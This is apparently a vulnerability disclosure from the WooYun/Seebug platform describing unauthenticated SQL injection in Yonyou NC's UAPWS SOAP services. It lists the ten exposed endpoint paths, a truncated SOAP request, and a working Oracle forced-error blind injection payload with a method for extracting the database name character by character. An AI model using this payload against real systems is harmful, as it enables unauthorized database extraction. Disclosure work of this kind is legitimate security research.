### Brief description:

Searched wooyun, nobody had reported it, so here is one.

### Details:

First, this interface can be reached without any authentication. Taking http://**.**.**.**/bugs/wooyun-2010-0178322 as an example, the following UAPWS web services are exposed:

- **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl
- **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvbasdocExportToCrmService?wsdl
- **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IMeasdocExportToCrmService?wsdl
- **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IInvclExportToCrmService?wsdl
- **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl
- **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IAreaclExportToCrmService?wsdl
- **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICustomerImportToNcService?wsdl
- **.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICorpExportToCrmService?wsdl
- **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IPsndocExportToCrmService?wsdl
- **.**.**.**:8080/uapws/service/nc.itf.bd.crm.IUserExportToCrmService?wsdl

All of them are injectable.

![04184.png](https://images.seebug.org/upload/201604/1818364061df662b74dbcb19d1e8de8062e9ac5e.png)

![04185.png](https://images.seebug.org/upload/201604/181843223b2d721edb1f8342ad0024764dd52366.png)

Error-based injection is not possible here: the values we supply are arbitrary filler and no database error text is returned in the response, and ordinary blind injection is not possible either. A DNS lookup (out-of-band) can be used instead. The request goes to the service endpoint without the `?wsdl` suffix:

```
**.**.**.**:8080/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService

<soapenv:Envelope xmlns:soapenv="http://**.**.**.**/soap/envelope/" xmlns:icur="http://crm.bd.itf.nc/ICurrtypeExportToCrmService">
   <soapenv:Header/>
   <soapenv:Body>
      <icur:exportCurrtypeToCrm>
```

![04186.png](https://images.seebug.org/upload/201604/18192248060e4edf1f871b937306cdd6988c7d7a.png)

There is a further case in which error-based injection is impossible, boolean blind injection is impossible, and time-based injection does not work either. There a forced-error blind technique can be used: the injected `CASE` returns `1` when the guessed condition holds and otherwise evaluates `CAST('a' AS INT)` divided by zero, which makes Oracle throw (ORA-01722 / ORA-01476) and the service fail, so the presence or absence of a failure answers one yes/no question per request:

```
'and 1=(SELECT (CASE WHEN (length((select SYS_CONTEXT('USERENV','DB_NAME') from dual))=4) THEN 1 ELSE CAST('a' AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)--
```

Varying the condition (`length(...)=N`, then the ASCII value of each character) recovers the data one answer at a time.

### Proof of vulnerability:

http://**.**.**.**:9090/